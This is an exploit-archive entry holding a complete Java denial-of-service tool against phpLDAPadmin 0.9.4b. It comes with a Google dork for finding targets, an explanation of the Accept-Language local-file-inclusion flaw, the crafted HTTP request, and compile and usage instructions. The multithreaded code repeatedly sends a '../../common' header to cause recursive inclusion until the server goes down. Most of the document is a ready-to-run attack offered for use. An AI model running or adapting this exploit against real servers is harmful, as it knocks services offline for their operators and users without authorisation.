phpLDAPadmin 0.9.4b DoS



EKU-ID: 1186 CVE: OSVDB-ID:
Author: Alguien Published: 2011-10-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/**
 * Exploit Title: phpLDAPadmin 0.9.4b DoS
 * Google Dork: "phpLDAPadmin - 0.9.4b"
 * Date: 2011-10-23
 * Author: Alguien
 * Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/
 * Version: 0.9.4b
 * Tested on: Red Hat
 * CVE : -
 *
 * Compilation:
 * ------------
 * $ javac phpldos.java
 *
 * Usage:
 * ------
 * $ java phpldos <host> <path> <threads>
 *
 * Example:
 * --------
 * $ java phpldos www.example.com /phpldapadmin/ 10
 *
 * Explanation:
 * ------------
 * The file "common.php" is vulnerable to LFI through the "Accept-Language"
 * HTTP header.
 *
 * if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
 *  // get the languages which are spetcified in the HTTP header
 *  $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
 *  $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] );
 *  foreach( $HTTP_LANGS2 as $key => $value ) {
 *      $value=preg_split ("/[-]+/", $value );
 *      $HTTP_LANGS2[$key]=$value[0];
 *  }
 *
 *  $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2);
 *  foreach( $HTTP_LANGS as $HTTP_LANG) {
 *      // try to grab one after the other the language file
 *      if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) &&
 *      is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) {
 *          ob_start();
 *          include realpath( "lang/recoded/$HTTP_LANG.php" );
 *          ob_end_clean();
 *          break;
 *      }
 *  }
 * }
 *
 * This exploit sends "../../common" in the Accept-Language header in order to
 * generate a recursive inclusions and cause a denial of service via resource
 * exhaustion.
 *
 * GET /phpldapadmin/common.php HTTP/1.1\r\n
 * Host: www.example.com\r\n
 * Accept-Language: ../../common\r\n
 * Connection: close\r\n
 * \r\n
 *
 */
import java.io.PrintStream;
import java.net.InetSocketAddress;
import java.net.Socket;
 
class phpldos implements Runnable {
 
    public static final int HTTP_PORT = 80;
    public static final int TIMEOUT = 10000;
    private static String host;
    private static String path;
    private Socket sk;
    private PrintStream ps;
 
    public void run() {
        while (true) {
            if (!open_connection()) {
                System.out.println("[+] Mission complete. Server is down };]");
                break;
            }
            send_attack();
            try {
                ps.close();
                sk.close();
            } catch (Exception e) {
                // D'oh!
            }
        }
    }
 
    private boolean open_connection() {
        try {
            sk = new Socket();
            sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT);
            ps = new PrintStream(sk.getOutputStream());
        } catch (Exception e) {
            return false;
        }
        return true;
    }
 
    private void send_attack() {
        try {
            String message = ""
                    + "GET " + path + "common.php HTTP/1.1\r\n"
                    + "Host: " + host + "\r\n"
                    + "Accept-Language: ../../common\r\n"
                    + "Connection: close\r\n"
                    + "\r\n";
            ps.print(message);
        } catch (Exception e) {
            // D'oh!
        }
    }
 
    public static void main(String[] args) {
        if (args.length != 3) {
            usage();
        }
        host = args[0];
        path = args[1];
        int threads = Integer.parseInt(args[2]);
        System.out.println("[+] Attacking with " + threads + " threads.");
        for (int i = 0; i < threads; i++) {
            new Thread(new phpldos()).start();
        }
    }
 
    public static void usage() {
        System.out.print(
                "###########################################################\n"
                + "#                    phpLDAPadmin DoS                     #\n"
                + "#    by: Alguien - http://alguienenlafisi.blogspot.com    #\n"
                + "###########################################################\n"
                + "Syntax  : java phpldos <host> <path> <threads>\n"
                + "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n");
        System.exit(1);
    }
}